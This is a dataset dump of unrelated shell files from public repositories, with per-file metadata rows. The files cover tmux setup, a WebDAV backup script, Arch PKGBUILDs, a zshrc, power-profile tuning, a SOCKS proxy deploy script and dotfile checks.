# --namespace monitoring --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-monitoring.yaml
# Cloudflare API Key - cert-manager namespace
#kubectl create secret generic cloudflare-api-key \
# --from-literal=api-key="$CF_API_KEY" \
# --namespace cert-manager --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/cert-manager/cloudflare/cloudflare-api-key.yaml
# qBittorrent Prune - default namespace
#kubectl create secret generic qbittorrent-prune \
# --from-literal=username="$QB_USERNAME" \
# --from-literal=password="$QB_PASSWORD" \
# --namespace default --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/default/qbittorrent-prune/qbittorrent-prune-values.yaml
# sonarr episode prune - default namespace
#kubectl create secret generic sonarr-episode-prune \
# --from-literal=api-key="$SONARR_APIKEY" \
# --namespace default --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/default/sonarr-episode-prune/sonarr-episode-prune-values.yaml
# sonarr exporter
#kubectl create secret generic sonarr-exporter \
# --from-literal=api-key="$SONARR_APIKEY" \
# --namespace monitoring --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/monitoring/sonarr-exporter/sonarr-exporter-values.yaml
# radarr exporter
#kubectl create secret generic radarr-exporter \
# --from-literal=api-key="$RADARR_APIKEY" \
# --namespace monitoring --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/monitoring/radarr-exporter/radarr-exporter-values.yaml
| true
|
fa5ac7a1de2082228a2b30dbd8cd031b9fe0364a
|
Shell
|
DorianListens/dotfiles
|
/tmuxwork.sh
|
UTF-8
| 1,256
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
SESSION="infoactive"
DIR="~/infoactive"
create_session() {
tmux -2 new-session -d -s "$SESSION"
# Editor Window
tmux send-keys "cd " $DIR C-m
tmux send-keys "vi" C-m
tmux split-window -v
tmux resize-pane -D 15
tmux send-keys "cd " $DIR C-m
tmux send-keys "ulimit -n 350" C-m
tmux send-keys "karma start" C-m
tmux split-window -h
tmux send-keys "cd " $DIR C-m
tmux send-keys "git fetch && git status" C-m
# Server stuff window
tmux new-window -t $SESSION:2 -n 'Server Processes'
tmux split-window -h
tmux split-window -h
tmux select-layout even-horizontal
tmux select-pane -t 1
tmux send-keys "cd " $DIR C-m
tmux send-keys "foreman run rails s" C-m
tmux select-pane -t 2
tmux send-keys "cd " $DIR C-m
tmux send-keys "rake jobs:work" C-m
tmux select-pane -t 3
tmux send-keys "cd " $DIR C-m
tmux send-keys "guard" C-m
tmux select-pane -t 1
tmux select-window -t $SESSION:1
tmux select-pane -t 1
}
session_exists() {
tmux list-sessions | sed -E 's/:.*$//' | grep -q "^$SESSION$"
}
attach_to_session() {
tmux -2 attach-session -t $SESSION
}
create_if_needed_and_attach() {
if ! session_exists; then
create_session
fi
attach_to_session
}
create_if_needed_and_attach
| true
|
283b8a37232b8c5ceef63a7b2797e15adce6ae94
|
Shell
|
rokiden/WebBackup
|
/webbackup.sh
|
UTF-8
| 1,104
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
if [[ $# -ne 3 ]] && [[ $# -ne 4 ]]; then
echo "Usage: $(basename $0) dir_path webdav user [backup_name]"
exit 0
fi
backup_dir=$1
webdav=$2
user=$3
if [ -n "$4" ]; then
backup_name=$4
else
backup_name=$(basename $backup_dir)
fi
backup_path="/var/tmp/"$backup_name"_$(date +%Y%m%d-%H%M%S).tar.gz"
backup_ts="/var/tmp/"$backup_name"_ts"
curl_url="$webdav/"$(basename $backup_path)
if [ -f "$backup_ts" ]; then
echo "Timestamp file found, find newer..."
[[ ! -z $(find $backup_dir -type f -newer $backup_ts) ]] && new_found=true || new_found=false
else
echo "Timestamp file not found"
new_found=true
fi
if $new_found; then
echo "Backuping..."
echo $backup_path
tar -cvzf $backup_path $backup_dir
if [ $? -eq 0 ]; then
echo "Uploading..."
curl --fail -T $backup_path -u $user: -H 'X-Requested-With: XMLHttpRequest' $curl_url && echo "Curl ok" || echo "Curl error"
touch $backup_ts
if [ $? -ne 0 ]; then
echo "Can't touch ts" >&2
fi
else
echo "tar error" >&2
fi
echo "Cleanup..."
rm $backup_path
else
echo "Backup skipped"
fi
| true
|
d7508a05867f61783263ff5d7947ae0d5281e893
|
Shell
|
ilventu/aur-mirror
|
/libretro-mednafen-pce-git/PKGBUILD
|
UTF-8
| 798
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: almostalive <almostalive2003 at gmail dot com>
pkgname=libretro-mednafen-pce-git
pkgver=20120910
pkgrel=1
pkgdesc="libretro implementation of mednafen's PC Engine."
arch=('i686' 'x86_64')
url="https://github.com/libretro/mednafen-pce-libretro"
license=('custom')
makedepends=('git')
conflicts=('libretro-super-git')
_gitroot="git://github.com/libretro/mednafen-pce-libretro.git"
_gitname="mednafen-pce-libretro"
build()
{
cd $srcdir
msg "Cloning mednafen-pce-libretro from GIT"
if [ -d $_gitname ]; then
cd $_gitname
git pull || return 1
else
git clone $_gitroot $_gitname || return 1
cd $_gitname
fi
make
}
package()
{
mkdir -p $pkgdir/usr/lib/libretro
install -v -m644 $srcdir/$_gitname/libretro.so $pkgdir/usr/lib/libretro/libretro-mednafen-pce.so
}
| true
|
3536f2d162a3464e0eb15665c803276b41230613
|
Shell
|
team5499/frc-2017-offseason
|
/updateVars.sh
|
UTF-8
| 315
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
vars_directory=$2
team_number=5499
if [ "${1}" == "push" ]; then
scp ${vars_directory} admin@roborio-${team_number}-frc.local:/home/lvuser/vars.json
ssh admin@roborio-${team_number}-frc.local "sync"
else
scp admin@roborio-${team_number}-frc.local:/home/lvuser/vars.json ${vars_directory}
fi
| true
|
96afe17e7c364d8dc4aeb3758265590394282e7b
|
Shell
|
bigklopp/Shell_git
|
/istring.sh
|
UTF-8
| 136
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
read -p "실행할까요? (y/n)" CHOICE
if [[ $CHOICE = [yY]* ]]
then
echo "실행됨"
else
echo "실행 취소됨"
fi
| true
|
67098f4d92158d3778b55f5dedf0b2708f65dc2c
|
Shell
|
p16i/segmentation-speed-benchmark
|
/scripts/run-experiments.sh
|
UTF-8
| 331
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
RUNS=$TOTAL
METHODS="$METHOD"
rm -rf .result*
for d in "$@"
do
for m in $METHODS
do
for i in `seq 1 $RUNS`
do
slug="$d-$m-$i"
echo "Running $slug"
time python3 "./scripts/$m" $d > .result-$slug
echo "sleep" && sleep 2
done
done
done
| true
|
71a72a1c2b9e2e03306a34fc461b54f13bc35078
|
Shell
|
Thallsrrt/Projeto-Thales
|
/MENU G. DE DISPOSITIVO.sh
|
UTF-8
| 1,930
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
TMP=0
MENU(){
OPCAO=$(dialog \
--stdout \
--title 'Menu' \
--menu 'Escolha uma opção' \
0 0 0 \
1 'Gerenciado de dispositivo' \
2 'Sair')
case $OPCAO in
1) GREP ;;
2) FIM ;;
255) exit ;;
*) exit 0 ;;
esac
}
FIM(){
dialog \
--title 'FLW' \
--yesno 'Deseja mesmo sair?' \
0 0
if (( $? == '0' )); then
exit 0
else
MENU
fi
}
GREP(){
OPCAO=$(dialog \
--stdout \
--title 'Gerenciar Dispositivo' \
--menu 'Escolha uma opção' \
0 0 0 \
1 'Configurar Teclado' \
2 'Informações da Bateria' \
3 'Informações da CPU' \
4 'Informações da Memória' \
5 'Versão do S.O' \
6 'Versão do kernel' \
7 'Informação da Placa de Vídeo' \
8 'Quanto tempo o PC está ligado' \
9 'Voltar')
case $OPCAO in
1) CTEC ;;
2) IBAT ;;
3) ICPU ;;
4) IMEM ;;
5) VDSO ;;
6) VKER ;;
7) IPVI ;;
8) TPCL ;;
9) MENU ;;
255) exit 0 ;;
*) exit 0 ;;
esac
}
CTEC(){
dialog --yesno 'Aperte YES para configurar o teclado' 0 0
if (( $? == "0" )); then
sed 's/us/br/g' /etc/default/keyboard > /etc/default/keyboard.tmp && mv /etc/default/keyboard.tmp /etc/default/keyboard
else
GREP
fi
if (( $? == '0' )); then
dialog --yesno 'Deseja reiniciar a máquina?' 0 0
if (( $? == '0' )); then
init 6
else
GREP
fi
fi
GREP
}
IBAT(){
clear
acpi -V
echo 'Digite [enter] para voltar'
read xxx
GREP
}
ICPU(){
clear
lscpu
echo 'Digite [enter] para voltar'
read xxx
GREP
}
IMEM(){
clear
free -h
echo 'Digite [enter] para voltar'
read xxx
GREP
}
VDSO(){
clear
lsb_release -a
echo 'Digite [enter] para voltar'
read xxx
GREP
}
VKER(){
clear
uname -r
echo 'Digite [enter] para voltar'
read xxx
GREP
}
IPVI(){
clear
lspci | grep -i vga
echo 'Digite [enter] para voltar'
read xxx
GREP
}
TPCL(){
clear
uptime
echo 'Digite [enter] para voltar'
read xxx
GREP
}
while (( $TMP == '0' )); do
MENU
done
| true
|
760cbd896636025313feb2bd7f53316e0d29912f
|
Shell
|
pktn/dotfiles
|
/.zshrc
|
UTF-8
| 3,323
| 2.890625
| 3
|
[] |
no_license
|
# 文字コードの設定
export LANG=ja_JP.UTF-8
# パスの設定
PATH=/usr/local/bin:$PATH
export MANPATH=/usr/local/share/man:/usr/local/man:/usr/share/man
export SVN_EDITOR=vim
# 関数
find-grep () { find . -type f -print | xargs grep -n --binary-files=without-match $@ }
# エイリアスの設定
alias ls='ls --color=auto'
alias ll='ls -ltr'
alias gd='dirs -v; echo -n "select number: "; read newdir; cd +"$newdir"'
alias vi='vim'
alias grep='grep --color=auto'
# プロンプトの設定
# PROMPT='%~# '
local GREEN=$'%{\e[1;31m%}'
local YELLOW=$'%{\e[1;33m%}'
local BLUE=$'%{\e[1;34m%}'
local DEFAULT=$'%{\e[1;m%}'
PROMPT=$BLUE'%~ '$DEFAULT'%(!.#.$) '
# ヒストリの設定
HISTFILE=~/.histfile
HISTSIZE=10000
SAVEHIST=10000
# 履歴ファイルに時刻を記録
setopt extended_history
# 補完するかの質問は画面を超える時にのみに行う。
LISTMAX=0
autoload -Uz compinit; compinit
# sudo でも補完の対象
zstyle ':completion:*:sudo:*' command-path /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin
# cdのタイミングで自動的にpushd
setopt auto_pushd
# 複数の zsh を同時に使う時など history ファイルに上書きせず追加
setopt append_history
# 補完候補が複数ある時に、一覧表示
setopt auto_list
# 保管結果をできるだけ詰める
setopt list_packed
# 補完キー(Tab, Ctrl+I) を連打するだけで順に補完候補を自動で補完
# setopt auto_menu
# カッコの対応などを自動的に補完
setopt auto_param_keys
# ディレクトリ名の補完で末尾の / を自動的に付加し、次の補完に備える
setopt auto_param_slash
# ビープ音を鳴らさないようにする
setopt no_beep
# 直前と同じコマンドラインはヒストリに追加しない
setopt hist_ignore_dups
# ヒストリにhistoryコマンドを記録しない
setopt hist_no_store
# 余分なスペースを削除してヒストリに記録する
setopt hist_reduce_blanks
# 行頭がスペースで始まるコマンドラインはヒストリに記録しない
# setopt hist_ignore_spece
# 重複したヒストリは追加しない
# setopt hist_ignore_all_dups
# ヒストリを呼び出してから実行する間に一旦編集できる状態になる
setopt hist_verify
# auto_list の補完候補一覧で、ls -F のようにファイルの種別をマーク表示しない
setopt no_list_types
# コマンドラインの引数で --prefix=/usr などの = 以降でも補完できる
setopt magic_equal_subst
# ファイル名の展開でディレクトリにマッチした場合末尾に / を付加する
setopt mark_dirs
# 8 ビット目を通すようになり、日本語のファイル名を表示可能
setopt print_eight_bit
# シェルのプロセスごとに履歴を共有
setopt share_history
# Ctrl+wで、直前の/までを削除する。
WORDCHARS='*?_-.[]~=&;!#$%^(){}<>'
# ファイルリスト補完でもlsと同様に色をつける。
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
# cd をしたときにlsを実行する
function chpwd() { ls }
# ディレクトリ名だけで、ディレクトリの移動をする。
setopt auto_cd
# C-s, C-qを無効にする。
setopt no_flow_control
[ -f ~/.zshrc.local ] && source ~/.zshrc.local
| true
|
706298b8701dda13c971cf5571ca806dd1c3cde7
|
Shell
|
kskovpen/bTag
|
/SimAnalysis/SimAnalysis/test/SimPlot/test/getListRF.zsh
|
UTF-8
| 1,553
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/env zsh
fpathMC="/dpm/in2p3.fr/home/cms/phedex/store/user/kskovpen/SimAnalysis/v20160409/"
liMC=($(/usr/bin/rfdir ${fpathMC} | awk '{print $9}'))
fpathMCXRD=$(echo ${fpathMC} | sed "s%/dpm%root://sbgse1.in2p3.fr//dpm%g")
nFilesMC=20
outDir="lists/"
rm -rf ${outDir}
mkdir ${outDir}
rm -f /tmp/tempMC.txt
for line in $liMC
do
echo $line
d1=$(echo $line)
liMC2=$(/usr/bin/rfdir ${fpathMC}${d1} | awk '{print $9}')
d2=($(echo $liMC2))
for id2 in $d2
do
liMC3=$(/usr/bin/rfdir ${fpathMC}${d1}/${id2})
d3=$(echo $liMC3 | awk '{print $9}')
liMC4=($(/usr/bin/rfdir ${fpathMC}${d1}/${id2}/${d3} | awk '{print $9}'))
for d4 in $liMC4
do
liMC5=($(/usr/bin/rfdir ${fpathMC}${d1}/${id2}/${d3}/${d4} | awk '{print $9}'))
for line2 in $liMC5
do
f1=$(echo $line2)
file=$(echo ${fpathMCXRD}${d1}/${id2}/${d3}/${d4}/${f1})
echo "${file}" >> /tmp/tempMC.txt
done
done
split -a 5 -l ${nFilesMC} -d /tmp/tempMC.txt /tmp/${d1}_
lsfi=($(ls /tmp/${d1}_*))
jid=0
for fil in $lsfi
do
sampStrip=$(echo $id2 | sed "s%_RunIISpring15MiniAODv2_.*%%g")
if [[ $#d2 != 1 && ${d1} != "tHFCNC13TeV" ]]; then
mv ${fil} ${outDir}${d1}_${sampStrip}_ID${jid}.txt
else
if [[ ${d1} == "tHFCNC13TeV" ]]; then
mv ${fil} ${outDir}${d1}"_"$(echo ${id2} | sed "s%_AODFASTSIM_.*%%g")_ID${jid}.txt
else
mv ${fil} ${outDir}${d1}_ID${jid}.txt
fi
fi
jid=$[$jid+1]
done
rm -f /tmp/tempMC.txt
done
done
| true
|
e3baeb9256a2a5a40387ae32b29f4d4383a0ef98
|
Shell
|
gdestuynder/ffos_packaged_app_signature_utils
|
/verify.sh
|
UTF-8
| 1,215
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
# Verifies a packaged app signature
# kang@mozilla.com
[[ $# -eq 2 ]] || {
echo "USAGE: $0 <signed.zip> <certificate.crt>"
exit 1
}
zip=$1
crt=$2
tmp_zip=$(mktemp -d)
tmp=$(mktemp -d)
certutil="certutil -d $tmp"
cmsutil="cmsutil -d $tmp"
cwd=$(pwd)
ex=0
cp "$zip" $tmp_zip/
cp "$crt" $tmp_zip/
cd $tmp_zip && unzip $(basename "$zip") || {
echo "Couldn't unzip $tmp_zip/$zip"
exit 1
}
[[ -d META-INF ]] || {
echo "Couldn't find directory $tmp_zip/META-INF"
exit 1
}
echo
echo "Just hit enter twice as password, this database is deleted at the end of the script run."
echo
$certutil -N
$certutil -A -n root-cert -t ",,C" -i $(basename "$crt")
$cmsutil -D -i META-INF/zigbert.rsa -c META-INF/zigbert.sf -u 6 && {
echo
echo ":) SIGNATURE CHECK SUCCESS: Congratulations, signature has been verified for the supplied certificate"
} || {
echo
echo ":( FAILED: Invalid signature"
ex=1
}
cd "$cwd"
rm -r $tmp
rm -r $tmp_zip
exit $ex
| true
|
9304bdedb575c316129699805aff17a2bec8933c
|
Shell
|
supplantr/ftw
|
/ftw
|
UTF-8
| 5,003
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
_defaults() {
PROFILE_FILE=/tmp/ftw.profile
MODULES=(uvcvideo videodev)
adp() {
CPUFREQ_GOVERNOR=ondemand
NMI_WATCHDOG=1
BUS_CONTROL=on
PCIE_ASPM_POLICY=default
LAPTOP_MODE=0
DIRTY_RATIO=30
DIRTY_BACKGROUND_RATIO=10
DIRTY_EXPIRE_CENTISECS=300
DIRTY_WRITEBACK_CENTISECS=3000
SCSI_HOST_POLICY=max_performance
REMOUNT_OPTIONS=relatime
BLOCKDEV_READAHEAD=256
HD_POWER_MANAGEMENT=254
HD_SPINDOWN_TIMEOUT=253
SND_INTEL_POWER_SAVE=0
SND_AC97_POWER_SAVE=0
WIRELESS_POWER_SAVE=off
BACKLIGHT_BRIGHTNESS=15
if [[ $MODULES ]]; then
for i in $MODULES; do
modprobe $i &> /dev/null
done
fi
}
bat() {
CPUFREQ_GOVERNOR=ondemand
NMI_WATCHDOG=0
BUS_CONTROL=auto
USB_AUTOSUSPEND_TIMEOUT=5
PCIE_ASPM_POLICY=powersave
LAPTOP_MODE=5
DIRTY_RATIO=90
DIRTY_BACKGROUND_RATIO=1
DIRTY_EXPIRE_CENTISECS=600
DIRTY_WRITEBACK_CENTISECS=6000
SCSI_HOST_POLICY=min_power
REMOUNT_OPTIONS=noatime
BLOCKDEV_READAHEAD=4096
HD_POWER_MANAGEMENT=1
HD_SPINDOWN_TIMEOUT=24
SND_INTEL_POWER_SAVE=1
SND_AC97_POWER_SAVE=1
WIRELESS_POWER_SAVE=on
BACKLIGHT_BRIGHTNESS=10
if [[ $MODULES ]]; then
for i in $MODULES; do
modprobe -r $i &> /dev/null
done
fi
}
}
_common() {
opt() { [[ -f $1 ]] && echo $2 > $1 2> /dev/null; }
if [[ $CPUFREQ_GOVERNOR ]]; then
modprobe cpufreq_$CPUFREQ_GOVERNOR &> /dev/null
for i in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
opt $i $CPUFREQ_GOVERNOR
done
fi
if [[ $NMI_WATCHDOG ]]; then
opt /proc/sys/kernel/nmi_watchdog $NMI_WATCHDOG
fi
if [[ $BUS_CONTROL ]]; then
for i in /sys/bus/*/devices/*/power/control; do
opt $i $BUS_CONTROL
done
fi
if [[ $USB_AUTOSUSPEND_TIMEOUT ]]; then
for i in /sys/bus/usb/devices/*/power/autosuspend; do
opt $i $USB_AUTOSUSPEND_TIMEOUT
done
fi
if [[ $PCIE_ASPM_POLICY ]]; then
opt /sys/module/pcie_aspm/parameters/policy $PCIE_ASPM_POLICY
fi
if [[ $LAPTOP_MODE ]]; then
opt /proc/sys/vm/laptop_mode $LAPTOP_MODE
fi
if [[ $DIRTY_RATIO ]]; then
opt /proc/sys/vm/dirty_ratio $DIRTY_RATIO
fi
if [[ $DIRTY_BACKGROUND_RATIO ]]; then
opt /proc/sys/vm/dirty_background_ratio $DIRTY_BACKGROUND_RATIO
fi
if [[ $DIRTY_EXPIRE_CENTISECS ]]; then
opt /proc/sys/vm/dirty_expire_centisecs $DIRTY_EXPIRE_CENTISECS
fi
if [[ $DIRTY_WRITEBACK_CENTISECS ]]; then
opt /proc/sys/vm/dirty_writeback_centisecs $DIRTY_WRITEBACK_CENTISECS
fi
if [[ $SCSI_HOST_POLICY ]]; then
for i in /sys/class/scsi_host/host*/link_power_management_policy; do
opt $i $SCSI_HOST_POLICY
done
fi
if [[ $REMOUNT_OPTIONS ]]; then
local p=${PARTITIONS:-/dev/sd*}
for i in $(awk "/^${p//\//\\/}/ {print \$1}" /etc/mtab); do
mount -o remount,$REMOUNT_OPTIONS $i
done
fi
for i in ${DEVICES:-/dev/sd?}; do
[[ $BLOCKDEV_READAHEAD ]] && blockdev --setra $BLOCKDEV_READAHEAD $i
[[ $HD_POWER_MANAGEMENT ]] && hdparm -q -B $HD_POWER_MANAGEMENT $i
[[ $HD_SPINDOWN_TIMEOUT ]] && hdparm -q -S $HD_SPINDOWN_TIMEOUT $i
done
if [[ $SND_INTEL_POWER_SAVE ]]; then
local dir=/sys/module/snd_hda_intel/parameters yn
[[ $SND_INTEL_POWER_SAVE -eq 1 ]] && yn=Y || yn=N
opt $dir/power_save_controller $yn
opt $dir/power_save $SND_INTEL_POWER_SAVE
fi
if [[ $SND_AC97_POWER_SAVE ]]; then
local dir=/sys/module/snd_ac97_codec/parameters
opt $dir/power_save $SND_AC97_POWER_SAVE
fi
if [[ $WIRELESS_POWER_SAVE ]]; then
for i in $(iw dev | grep Interface | cut -d ' ' -f 2); do
iw dev $i set power_save $WIRELESS_POWER_SAVE
done
fi
if [[ $BACKLIGHT_BRIGHTNESS ]]; then
for i in /sys/class/backlight/acpi_video*/brightness; do
opt $i $BACKLIGHT_BRIGHTNESS
done
fi
}
if [[ $1 && $(expr match "$1" '-') -eq 0 ]]; then
profile=$1
config=/etc/conf.d/ftw
[[ -f $config ]] && source $config || _defaults
if declare -f $profile > /dev/null; then
if [[ $EUID -ne 0 ]]; then
echo 'requires root privileges'
exit 1
fi
lock=/tmp/ftw.lock
[[ -f $lock ]] && exit 2
: > $lock
trap "rm -f $lock" EXIT
$profile
_common
[[ $PROFILE_FILE ]] && echo $profile > $PROFILE_FILE
else
echo "profile '$profile' does not exist in $config"
exit 1
fi
else
echo 'usage: ftw [profile]'
exit 1
fi
| true
|
6491f949d0db143692f09b4009b6167dbc3bf8e1
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/retropong/PKGBUILD
|
UTF-8
| 1,025
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Jozef Riha <jose1711 at gmail dot com>
pkgname=retropong
pkgver=1.0
pkgrel=2
pkgdesc="a simple pong remake"
arch=('i686' 'x86_64')
license=('GPL2')
url="http://sourceforge.net/projects/retropong/"
source=("http://downloads.sourceforge.net/project/${pkgname}/${pkgname}.tar.gz" "retropong.desktop")
depends=('sdl_mixer' 'sdl_ttf' 'bash')
md5sums=('cf5b70d1960419261530152243ee60d0'
'e065c2ebfa1d76cddc163811d1fb8fba')
build() {
cd $srcdir/$pkgname
gcc -o retropong -lSDL -lSDL_mixer -lSDL_ttf retropong.c
}
package() {
cd $srcdir/$pkgname
install -D -m755 ./retropong $pkgdir/usr/share/retropong/retropong
install -D -m644 ./retrofont.ttf $pkgdir/usr/share/retropong/retrofont.ttf
install -D -m644 ./*wav $pkgdir/usr/share/retropong/
echo -e "#"'!'"/bin/bash\ncd /usr/share/retropong/\n./retropong" >./retropong.sh
install -D -m755 ./retropong.sh $pkgdir/usr/bin/retropong
install -D -m644 $srcdir/retropong.desktop $pkgdir/usr/share/applications/retropong.desktop
}
| true
|
7cebb72c447ac3d5177df394509a6b331f40505f
|
Shell
|
gwang550/load-balancer-operator-for-kubernetes
|
/hack/test-ytt.sh
|
UTF-8
| 1,758
| 3.75
| 4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Copyright 2020 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
set -o errexit # Exits immediately on unexpected errors (does not bypass traps)
set -o nounset # Errors if variables are used without first being defined
set -o pipefail # Non-zero exit codes in piped commands causes pipeline to fail
# with that code
# Change directories to the parent directory of the one in which this script is
# located.
cd "$(dirname "${BASH_SOURCE[0]}")/.."
export PATH=$PATH:$PWD/hack/tools/bin
export TEMPLATE_DIR="config/ytt/akodeploymentconfig"
if command -v tput &>/dev/null && tty -s; then
RED=$(tput setaf 1)
NORMAL=$(tput sgr0)
else
RED=$(echo -en "\e[31m")
NORMAL=$(echo -en "\e[00m")
fi
log_failure() {
printf "${RED}✖ %s${NORMAL}\n" "$@" >&2
}
assert_eq() {
local expected="$1"
local actual="$2"
local msg="${3-}"
if [ "$expected" == "$actual" ]; then
return 0
else
if [ "${#msg}" -gt 0 ]; then
log_failure "$expected == $actual :: $msg" || true
fi
return 1
fi
}
case1() {
# Test the default AKODeploymentConfig template generation
ytt -f config/ytt/akodeploymentconfig/values.yaml -f config/ytt/akodeploymentconfig/akodeploymentconfig.yaml >/dev/null 2>&1
}
case2() {
# Test the ip pools section
res="$(ytt -f config/ytt/akodeploymentconfig/values.yaml -f config/ytt/akodeploymentconfig/akodeploymentconfig.yaml -v AVI_DATA_NETWORK_IP_POOL_START=10.0.0.2 -v AVI_DATA_NETWORK_IP_POOL_END=10.0.0.3 -o json 2>&1)"
assert_eq "$(echo "${res}" | jq -cr 'select( .spec).spec.dataNetwork.ipPools[].start')" "10.0.0.2" "failed ipPools"
assert_eq "$(echo "${res}" | jq -cr 'select( .spec).spec.dataNetwork.ipPools[].end')" "10.0.0.3" "failed ipPools"
}
case1
case2
| true
|
36c7ea02860c09d909166520bdca118ef03077b0
|
Shell
|
sgs921107/docker_ss5
|
/deploy/deploy.sh
|
UTF-8
| 1,695
| 3.34375
| 3
|
[] |
no_license
|
#########################################################################
# File Name: deploy.sh
# Author: qiezi
# mail: qiezi@gmail.com
# Created Time: Wed 19 Feb 2020 12:29:13 PM CST
#########################################################################
#!/bin/bash
# ===================run the script with root user=================================
# ==========================开始配置==================================
# 1.docker-compose.yml依赖配置
SS5_VERSION=1.0
# 宿主机ss5服务端口
REAL_SS5_PORT=1080
# 2.squid服务配置
# squid的用户名
ss5_username=ss5
# squid的密码
ss5_password=online
# 是否指定pip的下载源
# pip_repository=https://pypi.tuna.tsinghua.edu.cn/simple
pip_repository=
# ==========================配置结束==================================
ss5_dir=..
mkdir -p $ss5_dir/logs
# 声明变量
install_docker_script=./install_docker.sh
ss5_conf=$ss5_dir/ss5.conf
ss5_users=$ss5_dir/ss5.passwd
ss5_logs=$ss5_dir/logs
# 检查/安装docker和docker-compose
if [ -n "$pip_repository" ]
then
sed -i "s#pip install#pip install -i $pip_repository#g" $install_docker_script
fi
sh $install_docker_script
if [ -n "$pip_repository" ]
then
git checkout $install_docker_script
fi
echo "$ss5_username $ss5_password" > $ss5_users
echo "SS5_VERSION=$SS5_VERSION
REAL_SS5_PORT=$REAL_SS5_PORT
SS5_CONF=$ss5_conf
SS5_USERS=$ss5_users
SS5_LOGS=$ss5_logs
" > .env
echo "auth 0.0.0.0/0 - u
permit u 0.0.0.0/0 - 0.0.0.0/0 - - - - -
" > $ss5_conf
# 启动服务
docker-compose up -d
firewall-cmd --permanent --add-port=$REAL_SS5_PORT/tcp
firewall-cmd --permanent --add-port=$REAL_SS5_PORT/udp
# 重新加载防火墙
firewall-cmd --reload
| true
|
f7643c8cfdbf3822033992fcbb714808a766fa62
|
Shell
|
jasmith79/jasmith79-dotfiles
|
/testcheck.sh
|
UTF-8
| 4,150
| 3.375
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
os=$(uname)
# Determine working directory
wd=$(pwd)
# Determine current user
user=$(logname)
who=$(whoami)
if [[ $user = "" ]]; then
user="$SUDO_USER"
fi
if [[ $user = "" ]]; then
user="$who"
fi
# TODO: replace these with version checks
if command -v git >/dev/null; then
echo "Git successfully installed."
else
echo "ERROR: missing git."
fi
if command -v gcc >/dev/null; then
echo "gcc successfully installed."
else
echo "ERROR: missing gcc."
fi
if command -v make >/dev/null; then
echo "Make successfully installed."
else
echo "ERROR: missing make."
fi
if command -v node >/dev/null; then
echo "Nodejs successfully installed."
else
echo "ERROR: missing nodejs."
fi
if command -v webpack >/dev/null; then
echo "Webpack successfully installed."
else
echo "ERROR: missing webpack."
fi
if command -v yarn >/dev/null; then
echo "Yarn successfully installed."
else
echo "ERROR: missing yarn."
fi
if command -v atom >/dev/null; then
echo "Atom successfully installed."
else
echo "ERROR: missing atom."
fi
if command -v vagrant >/dev/null; then
echo "vagrant successfully installed."
else
echo "ERROR: missing vagrant."
fi
if command -v ansible-playbook >/dev/null; then
echo "Ansible successfully installed."
else
echo "ERROR: missing ansible."
fi
if command -v virtualenv >/dev/null; then
echo "virtualenv successfully installed."
else
echo "ERROR: missing virtualenv."
fi
if command -v python3 >/dev/null; then
echo "Python3 successfully installed."
else
echo "ERROR: missing python3."
fi
if command -v pip3 >/dev/null; then
echo "pip3 successfully installed."
else
echo "ERROR: missing pip3."
fi
if command -v fish >/dev/null; then
echo "Fish shell successfully installed."
else
echo "ERROR: missing fish shell."
fi
if command -v clj >/dev/null; then
echo "Clojure successfully installed."
else
echo "ERROR: missing Clojure."
fi
if command -v lein >/dev/null; then
echo "Leiningen successfully installed."
else
echo "ERROR: missing leiningen."
fi
if command -v nvim >/dev/null; then
echo "Neovim successfully installed."
else
echo "ERROR: missing neovim."
fi
if command -v greadlink > /dev/null; then
bashlnk="$(greadlink -f ~/.bashrc)"
vimlnk="$(greadlink -f ~/.vimrc)"
nvimlnk="$(greadlink -f ~/.config/nvim/init.vim)"
fishlnk="$(greadlink -f ~/.config/fish/config.fish)"
keylnk="$(greadlink -f ~/.config/fish/functions/fish_user_key_bindings.fish)"
else
bashlnk="$(readlink -f ~/.bashrc)"
vimlnk="$(readlink -f ~/.vimrc)"
nvimlnk="$(readlink -f ~/.config/nvim/init.vim)"
fishlnk="$(readlink -f ~/.config/fish/config.fish)"
keylnk="$(readlink -f ~/.config/fish/functions/fish_user_key_bindings.fish)"
fi
if [[ "$bashlnk" = "$wd/bashrc" ]]; then
echo "~/.bashrc successfully copied"
else
echo "ERROR: missing bashrc"
fi
if [[ "$vimlnk" = "$wd/vim/vimrc" ]]; then
echo "~/.vimrc successfully copied"
else
echo "ERROR: missing vimrc"
fi
if [[ "$fishlnk" = "$wd/fish/config.fish" ]]; then
echo "~/.config/fish/config.fish successfully copied"
else
echo "ERROR: missing config.fish"
fi
